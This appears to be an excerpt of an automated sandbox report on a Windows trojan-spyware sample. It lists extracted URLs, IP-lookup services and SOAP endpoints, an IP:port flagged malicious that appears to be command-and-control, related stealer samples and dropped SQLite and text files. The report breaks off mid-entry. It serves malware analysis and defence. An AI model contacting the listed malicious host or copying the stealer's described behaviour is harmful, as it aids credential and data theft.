http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	false		high
http://www.fontbureau.com/designers	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.137.22.250:55615	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdates	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgcookies//settinString.Removeg	ljMiHZ8MwZ.exe, ljMiHZ8MwZ.exe, 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	false		high
http://www.galapagosdesign.com/DPlease	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	ljMiHZ8MwZ.exe, 00000000.00000002.1743045301.0000000005B14000.00000004.00000020.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipinfo.io/ip%appdata%	ljMiHZ8MwZ.exe, ljMiHZ8MwZ.exe, 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	ljMiHZ8MwZ.exe, ljMiHZ8MwZ.exe, 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.ip.sb	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	false		high
http://tempuri.org/Endpoint/SetEnviron	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.137.22.250:5	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.137.22.250	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581021
Start date and time:	2024-12-26 17:41:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ljMiHZ8MwZ.exe renamed because original name is a hash value
Original Sample Name:	4153363158f713a02e405d251823c0c3.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/47@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 96 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31, 184.28.90.27, 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:42:03	API Interceptor	52x Sleep call for process: ljMiHZ8MwZ.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROOTLAYERNETNL	aYf5ibGObB.exe	Get hash	malicious	RedLine	Browse	185.222.58.90
	K3xL5Xy0XS.exe	Get hash	malicious	RedLine	Browse	185.222.58.90
	Invoice-BL. Payment TT $ 16945.99.exe	Get hash	malicious	RedLine	Browse	45.137.22.164
	MfzXU6tKOq.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.82
	lWnSA7IyVc.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.229
	8ZVd2S51fr.exe	Get hash	malicious	RedLine	Browse	185.222.58.241
	Purchase Order Purchase Order Purchase Order Purchase Order.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.222.57.90
	Purchase Order Purchase Order Purchase Order Purchase Order.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.222.57.90
	9dOKGgFNL2.exe	Get hash	malicious	RedLine	Browse	45.137.22.126
	RFQ List and airflight 2024.pif.exe	Get hash	malicious	PureLog Stealer	Browse	45.137.22.174

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\tmp42E5.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp42F6.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4306.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4317.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4318.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4329.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4339.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp58D2.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\Temp\tmp58E2.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
